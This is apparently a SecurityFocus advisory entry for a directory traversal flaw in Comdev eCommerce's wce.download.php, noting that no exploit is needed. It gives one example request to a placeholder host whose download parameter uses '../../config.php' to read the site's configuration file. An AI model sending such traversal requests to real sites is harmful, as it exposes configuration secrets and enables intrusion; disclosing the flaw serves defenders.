Comdev eCommerce WCE.Download.PHP Directory Traversal Vulnerability

No exploit is required.

An example has been provided:

http://www.vulnerable.com/oneadmin/faqsupport/wce.download.php?download=../../config.php


 

Privacy Statement
Copyright 2010, SecurityFocus